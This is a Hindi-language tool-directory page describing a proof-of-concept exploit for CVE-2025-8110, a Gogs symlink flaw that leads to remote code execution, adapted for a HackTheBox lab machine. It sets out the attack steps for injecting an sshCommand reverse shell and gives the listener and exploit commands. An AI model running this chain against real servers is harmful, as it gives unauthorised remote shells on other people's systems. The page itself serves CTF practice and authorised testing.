Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8110 — Gogs सेवा का शोषण करें और रूट उपयोगकर्ता प्राप्त करें | Kitploit
उपकरण/GitHubGitHub/ixzodiak/cve-2025-8110
शोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूल
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Gogs सेवा का शोषण करें और रूट उपयोगकर्ता प्राप्त करें

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

अस्वीकरण: यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति हो।


यह zAbuQasem/gogs-CVE-2025-8110 का संशोधित संस्करण है, जिसे HackTheBox पर Silentium मशीन के विरुद्ध काम करने के लिए अनुकूलित किया गया है। मूल PoC को Silentium की विशिष्ट Gogs कॉन्फ़िगरेशन और प्रमाणीकरण प्रवाह को संभालने के लिए समायोजन की आवश्यकता थी।


भेद्यता

CVE-2025-8110 Gogs में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो एक सेल्फ-होस्टेड Git सेवा है।

Gogs का file-update API एंडपॉइंट (PUT /api/v1/repos/.../contents/<file>) यह सत्यापित नहीं करता है कि लक्षित फ़ाइल symlink है या नहीं। एक प्रमाणित हमलावर रिपॉज़िटरी में एक symlink पुश कर सकता है जो .git/config की ओर इंगित करता है, फिर API का उपयोग करके उसे दुर्भावनापूर्ण पेलोड से ओवरराइट कर सकता है। पेलोड git config में एक कस्टम sshCommand इंजेक्ट करता है, जिसे Gogs उस रिपॉज़िटरी पर अगली बार SSH ऑपरेशन करते समय सर्वर-साइड निष्पादित करता है, जिसके परिणामस्वरूप रिमोट कोड एक्ज़ीक्यूशन होता है।


PoC क्या करता है

  1. Gogs में प्रमाणित होता है और लॉगिन पेज से CSRF टोकन निकालता है।
  2. उपयोगकर्ता सेटिंग्स पेज के माध्यम से Gogs API टोकन उत्पन्न करता है।
  3. SSH सक्षम के साथ API के माध्यम से एक नई रिपॉज़िटरी बनाता है।
  4. रिपो को स्थानीय रूप से क्लोन करता है, एक symlink (malicious_link -> .git/config) स्थापित करता है, और उसे पुश करता है।
  5. symlink पर file-update API को कॉल करता है, एक दुर्भावनापूर्ण .git/config लिखता है जिसमें sshCommand = <reverse shell> होता है।
  6. Gogs symlink का अनुसरण करता है और अपने स्वयं के .git/config को ओवरराइट करता है, जिससे अगली SSH ऑपरेशन पर शेल ट्रिगर हो जाता है।

उपयोग

निर्भरताएँ इंस्टॉल करें:

root@kitploit:~
pip install -r requirements.txt

लिसनर शुरू करें:

root@kitploit:~
nc -lvnp <PORT>

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

वैकल्पिक — Burp Suite के माध्यम से रूट करें:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
टूल डाउनलोड करें
फ़्लैगविवरण
-uGogs बेस URL
-lhआपका अटैकर IP (रिवर्स शेल होस्ट)
-lpआपका लिसनर पोर्ट
-unआपका पंजीकृत Gogs उपयोगकर्ता नाम
-pwआपका Gogs पासवर्ड
-x(वैकल्पिक) localhost:8080 पर Burp के माध्यम से ट्रैफ़िक रूट करें